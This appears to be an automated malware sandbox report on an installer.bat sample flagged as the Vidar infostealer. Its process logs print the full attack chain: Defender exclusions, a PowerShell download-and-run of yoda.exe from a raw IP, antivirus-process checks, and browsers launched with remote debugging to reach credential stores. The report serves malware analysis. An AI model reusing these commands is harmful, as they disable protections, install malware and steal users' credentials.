Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009122AD	21_2_009122AD
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0094A26E	21_2_0094A26E
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0092C624	21_2_0092C624
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0099C8A4	21_2_0099C8A4
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0094E87F	21_2_0094E87F
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00946ADE	21_2_00946ADE
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00982A05	21_2_00982A05
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00978BFF	21_2_00978BFF
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0092CD7A	21_2_0092CD7A
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0093CE10	21_2_0093CE10
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00947159	21_2_00947159
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00919240	21_2_00919240
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009A5311	21_2_009A5311
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009196E0	21_2_009196E0
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00931704	21_2_00931704
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00931A76	21_2_00931A76
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00937B8B	21_2_00937B8B
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00919B60	21_2_00919B60
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00937DBA	21_2_00937DBA
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00931D20	21_2_00931D20
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00931FE7	21_2_00931FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\314782\Iceland.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: String function: 00930DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: String function: 0092FD52 appears 40 times

Source: 21.2.Iceland.com.42f0000.1.unpack, type: UNPACKEDPE

Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@120/321@25/17

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_009841FA GetLastError,FormatMessageW,

21_2_009841FA

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00972010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		21_2_00972010
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00971A0B AdjustTokenPrivileges,CloseHandle,		21_2_00971A0B

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

11_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0097DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

21_2_0097DD87

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

Code function: 11_2_004024FB CoCreateInstance,

11_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_00983A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

21_2_00983A0E

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\940EYOMM.htm

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:980:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqk4ajak.hk1.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" "

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\cacls.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000018.00000002.2725876106.000054DC00A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCUE:2};T
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00724000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: EC2DJWT0H.21.dr, JMYU379ZC.21.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionExtension '.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 4
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\yoda.exe yoda.exe
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 314782
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "INSPIRED" Interview
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Iceland.com A
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2316,i,16410334489771861584,14253994741455031161,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2368,i,6727333720448355785,14806548561712805577,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2072,i,3852677470935874424,11790691988476630425,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2580,i,8334093384874022839,11229385181323441038,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1980,i,17978194118169702811,13122044973761353622,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2660 --field-trial-handle=2308,i,4857392273965620054,3048248773784567787,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6884 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7036 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionExtension '.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-Webrequest 'http://5.252.155.64/yoda.exe' -OutFile yoda.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\yoda.exe yoda.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 314782	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "INSPIRED" Interview	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Iceland.com A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2316,i,16410334489771861584,14253994741455031161,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2580,i,8334093384874022839,11229385181323441038,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2368,i,6727333720448355785,14806548561712805577,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2072,i,3852677470935874424,11790691988476630425,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2580,i,8334093384874022839,11229385181323441038,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1980,i,17978194118169702811,13122044973761353622,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2660 --field-trial-handle=2308,i,4857392273965620054,3048248773784567787,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6884 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7036 --field-trial-handle=2092,i,8055557621912514682,17074701183551998572,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
